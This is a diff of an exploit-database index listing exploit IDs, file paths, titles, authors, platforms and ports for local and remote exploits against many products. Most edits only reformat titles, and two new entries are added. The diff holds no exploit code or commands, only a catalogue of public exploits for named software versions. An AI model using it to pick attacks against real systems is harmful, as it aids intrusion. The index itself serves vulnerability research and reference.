18064,platforms/linux/local/18064.sh,"Calibre E-Book Reader - Privilege Escalation (1)",2011-11-02,zx2c4,linux,local,0 18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,windows,local,0 18071,platforms/linux/local/18071.sh,"Calibre E-Book Reader - Privilege Escalation (2)",2011-11-03,zx2c4,linux,local,0 @@ -7546,7 +7546,7 @@ id,file,description,date,author,platform,type,port 19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0 19656,platforms/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer Overflow",1999-12-03,"Brock Tellier",sco,local,0 19657,platforms/sco/local/19657.txt,"SCO Unixware 7.1 - '/var/mail' Permissions",1999-12-03,"Brock Tellier",sco,local,0 -19658,platforms/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' command Exploit",1999-12-03,"Brock Tellier",sco,local,0 +19658,platforms/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' Exploit",1999-12-03,"Brock Tellier",sco,local,0 19659,platforms/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink Exploit",1999-12-03,"Brock Tellier",sco,local,0 19660,platforms/sco/local/19660.c,"SCO Unixware 7.1 pkgcat - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 @@ -7904,7 +7904,7 @@ id,file,description,date,author,platform,type,port 21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Privilege Escalation",2002-01-14,"Charles Stevenson",linux,local,0 21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow",2002-01-16,"SuSE Security",linux,local,0 21231,platforms/linux/local/21231.c,"Chinput 3.0 - Environment Variable Buffer Overflow",2002-01-16,xperc,linux,local,0 -21239,platforms/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 - WebTop SCOAdminReg.cgi Arbitrary Command Execution",2002-01-20,jGgM,unixware,local,0 +21239,platforms/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 - WebTop 'SCOAdminReg.cgi' Arbitrary Command Execution",2002-01-20,jGgM,unixware,local,0 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0 21247,platforms/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local,0 21248,platforms/linux/local/21248.txt,"(Linux Kernel 2.4.17-8) User-Mode Linux - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",linux,local,0 @@ -8776,7 +8776,7 @@ id,file,description,date,author,platform,type,port 37183,platforms/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0 37211,platforms/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 -37265,platforms/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Command Privilege Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0 +37265,platforms/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Privilege Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0 37292,platforms/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation",2015-06-16,rebel,linux,local,0 37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0 @@ -8865,7 +8865,7 @@ id,file,description,date,author,platform,type,port 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - Stack Overflow (SEH)",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",windows,local,0 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,windows,local,0 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - Based Stack Overflow (SEH) (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0 -38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 +38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - 'pcap' Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0 38576,platforms/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 @@ -9307,6 +9307,8 @@ id,file,description,date,author,platform,type,port 43017,platforms/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,windows,local,0 43029,platforms/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation",2017-10-22,"@XeR_0x2A and @chaign_c",linux,local,0 43033,platforms/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,windows,local,0 +43056,platforms/php/local/43056.py,"PHPMailer < 5.2.21 - Local File Disclosure",2017-10-25,"Maciek Krupa",php,local,0 +43057,platforms/windows/local/43057.txt,"HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow",2017-10-26,cbayet,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9328,7 +9330,7 @@ id,file,description,date,author,platform,type,port 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) - Remote Exploit",2003-05-29,anonymous,linux,remote,80 36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 -38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 +38,platforms/linux/remote/38.pl,"Apache 2.0.45 - 'APR' Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 Build 0402 - Remote Format String",2003-06-11,ThreaT,windows,remote,25 @@ -9392,7 +9394,7 @@ id,file,description,date,author,platform,type,port 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,linux,remote,406 143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote,0 -149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Command Remote Exploit",2004-01-27,lion,windows,remote,21 +149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Exploit",2004-01-27,lion,windows,remote,21 151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 155,platforms/windows/remote/155.c,"Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow",2004-02-26,Rave,windows,remote,8080 @@ -9471,7 +9473,7 @@ id,file,description,date,author,platform,type,port 373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - message system Remote Shell",2004-08-04,infamous41md,linux,remote,21 378,platforms/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote,0 -380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 +380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Remote Buffer Overflow",2004-08-08,infamous41md,linux,remote,80 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote,0 386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,linux,remote,80 387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Code Execution",2004-08-09,livenn,linux,remote,22 @@ -9574,7 +9576,7 @@ id,file,description,date,author,platform,type,port 784,platforms/linux/remote/784.c,"ngIRCd 0.8.2 - Remote Format String",2005-02-03,CoKi,linux,remote,6667 785,platforms/linux/remote/785.c,"Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2)",2005-02-03,cybertronic,linux,remote,119 787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow",2005-02-04,CorryL,windows,remote,80 -794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 +794,platforms/windows/remote/794.c,"3CServer 1.1 (FTP Server) - Remote Exploit",2005-02-07,mandragore,windows,remote,21 802,platforms/windows/remote/802.cpp,"MSN Messenger - '.png' Image Buffer Overflow Download Shellcode Exploit",2005-02-09,ATmaCA,windows,remote,0 804,platforms/windows/remote/804.c,"MSN Messenger (Linux) - '.png' Image Buffer Overflow",2005-02-09,dgr,windows,remote,0 805,platforms/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell",2005-02-09,n4rk0tix,multiple,remote,8080 @@ -9597,17 +9599,17 @@ id,file,description,date,author,platform,type,port 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow",2005-03-13,class101,windows,remote,5093 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0 -879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Remote Exploit",2005-03-14,lammat,multiple,remote,0 +879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - 'GET' Remote Exploit",2005-03-14,lammat,multiple,remote,0 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Exploit",2005-03-29,crash-x,linux,remote,143 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,windows,remote,42 -915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - Imapd Remote Exploit",2005-04-05,Expanders,linux,remote,143 +915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - IMAPd Remote Exploit",2005-04-05,Expanders,linux,remote,143 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption",2005-04-12,Skylined,windows,remote,0 934,platforms/linux/remote/934.c,"gld 1.4 - Postfix Greylisting Daemon Remote Format String",2005-04-13,Xpl017Elz,linux,remote,2525 -940,platforms/linux/remote/940.c,"Sumus 0.2.2 - httpd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 +940,platforms/linux/remote/940.c,"Sumus 0.2.2 - HTTPd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",windows,remote,0 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - GET Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80 @@ -9759,7 +9761,7 @@ id,file,description,date,author,platform,type,port 1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow",2006-04-11,"Paul Haas",windows,remote,0 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - WebConsole Remote Stack Overflow (Metasploit)",2006-04-15,Metasploit,windows,remote,8080 -1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 +1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password",2006-04-21,"Marc Bevand",windows,remote,8004 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - GET Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - 'parse_xml.cgi' Code Execution",2003-02-24,FOX_MULDER,osx,remote,0 1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow",2006-05-02,"Stefano Di Paola",linux,remote,3306 @@ -9935,7 +9937,7 @@ id,file,description,date,author,platform,type,port 3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution (PoC)",2007-03-15,"Core Security",bsd,remote,0 3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",windows,remote,6503 3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",windows,remote,554 -3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP (Subscribe) Remote Exploit",2007-03-21,"Winny Thomas",windows,remote,143 +3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Exploit",2007-03-21,"Winny Thomas",windows,remote,143 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 < SP4 - IMAP Remote Exploit (Egghunter)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69 3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - Dynamic DNS Updates Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0 @@ -10063,7 +10065,7 @@ id,file,description,date,author,platform,type,port 4234,platforms/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server - Data Write/Code Execution",2007-07-27,callAX,windows,remote,0 4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Execution",2007-07-27,h07,windows,remote,0 4240,platforms/windows/remote/4240.html,"VMware 'IntraProcessLogging.dll' 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0 -4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow",2007-07-29,vade79,linux,remote,80 +4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha - HTTPd Remote Buffer Overflow",2007-07-29,vade79,linux,remote,80 4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - 'vielib.dll 2.2.5.42958' Remode Code Execution",2007-07-29,callAX,windows,remote,0 4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution",2007-07-30,callAX,windows,remote,0 4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 - Create-Request Remote Overflow",2007-07-30,BackBone,windows,remote,3050 @@ -10086,7 +10088,7 @@ id,file,description,date,author,platform,type,port 4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Remote Exploit",2007-08-28,shinnai,windows,remote,0 4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'SaveXMLFile()' Insecure Method",2007-08-27,shinnai,windows,remote,0 4324,platforms/windows/remote/4324.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'DeleteXMLFile()' Insecure Method",2007-08-27,shinnai,windows,remote,0 -4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 - / Quiksoft EasyMail 'emsmtp.dll 6.0.1' Buffer Overflow",2007-08-28,rgod,windows,remote,0 +4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Buffer Overflow",2007-08-28,rgod,windows,remote,0 4334,platforms/windows/remote/4334.txt,"Microsoft MSN Messenger 7.x/8.0? - Video Remote Heap Overflow",2007-08-29,wushi,windows,remote,0 4348,platforms/windows/remote/4348.c,"PPStream - 'PowerPlayer.dll 2.0.1.3829' ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger - 'YVerInfo.dll 2007.8.27.1' ActiveX Buffer Overflow",2007-09-01,minhbq,windows,remote,0 @@ -10107,7 +10109,7 @@ id,file,description,date,author,platform,type,port 4424,platforms/windows/remote/4424.html,"Apple QuickTime /w IE .qtl Version XAS - Remote Exploit (PoC)",2007-09-18,"Aviv Raff",windows,remote,0 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution",2007-09-19,h07,windows,remote,0 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 -4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow",2007-09-19,void,windows,remote,143 +4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - 'SEARCH' Authenticated Overflow",2007-09-19,void,windows,remote,143 4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow",2007-09-21,axis,windows,remote,25 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - 'emprint.dll 6.0.1.0' Buffer Overflow",2007-09-23,rgod,windows,remote,0 @@ -10137,7 +10139,7 @@ id,file,description,date,author,platform,type,port 4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow",2007-10-27,muts,windows,remote,1581 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 - IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143 4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,windows,remote,0 -4594,platforms/windows/remote/4594.html,"SonicWALL SSL-VPN - NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 +4594,platforms/windows/remote/4594.html,"SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 - Insecure Method Exploit",2007-11-02,shinnai,windows,remote,0 4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista/XP) - RSTP Response Code Execution",2007-11-24,InTeL,windows,remote,0 @@ -10146,7 +10148,7 @@ id,file,description,date,author,platform,type,port 4664,platforms/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 - RSTP Response Universal Exploit",2007-11-27,"YAG KOHHA",windows,remote,0 4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal Exploit",2007-11-29,"Subreption LLC.",multiple,remote,0 4699,platforms/windows/remote/4699.txt,"firefly media server (mt-daapd) 2.4.1 / svn 1699 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 -4700,platforms/windows/remote/4700.txt,"simple httpd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 +4700,platforms/windows/remote/4700.txt,"Simple HTTPd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 4713,platforms/windows/remote/4713.txt,"barracudadrive 3.7.2 - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4715,platforms/windows/remote/4715.txt,"BadBlue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote,0 @@ -10299,7 +10301,7 @@ id,file,description,date,author,platform,type,port 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 6151,platforms/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0 -6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) - FTP Server Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0 +6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0 6175,platforms/windows/remote/6175.html,"NCTsoft - 'AudFile.dll' ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote,0 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - 'imgsrc' Remote Buffer Overflow",2008-08-03,r0ut3r,windows,remote,0 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0 @@ -10472,7 +10474,7 @@ id,file,description,date,author,platform,type,port 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 -8295,platforms/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22 +8295,platforms/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0 @@ -10678,7 +10680,7 @@ id,file,description,date,author,platform,type,port 10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,linux,remote,143 10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit (Metasploit)",2005-10-18,"KaiJern Lau",linux,remote,9080 10027,platforms/linux/remote/10027.rb,"PeerCast 0.1216 - Exploit (Metasploit)",2006-03-08,MC,linux,remote,7144 -10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",cgi,remote,80 +10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - 'apply.cgi' Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",cgi,remote,80 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80 10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Overflow Exploit (Metasploit)",2004-07-18,onetwo,linux,remote,7787 @@ -10705,7 +10707,7 @@ id,file,description,date,author,platform,type,port 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0 10099,platforms/windows/remote/10099.py,"Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow",2009-11-16,ryujin,windows,remote,80 -10162,platforms/windows/remote/10162.py,"Home FTP Server - 'MKD' Command Directory Traversal",2009-11-17,zhangmc,windows,remote,21 +10162,platforms/windows/remote/10162.py,"Home FTP Server - 'MKD' Directory Traversal",2009-11-17,zhangmc,windows,remote,21 10235,platforms/windows/remote/10235.py,"Eureka Email Client - Remote Buffer Overflow",2009-11-26,"Dr_IDE and dookie",windows,remote,0 10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion",2009-12-01,sharpe,windows,remote,21 10269,platforms/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote,0 @@ -10732,7 +10734,7 @@ id,file,description,date,author,platform,type,port 11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0 11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,windows,remote,0 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 -11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0 +11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,windows,remote,0 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0 @@ -10767,18 +10769,18 @@ 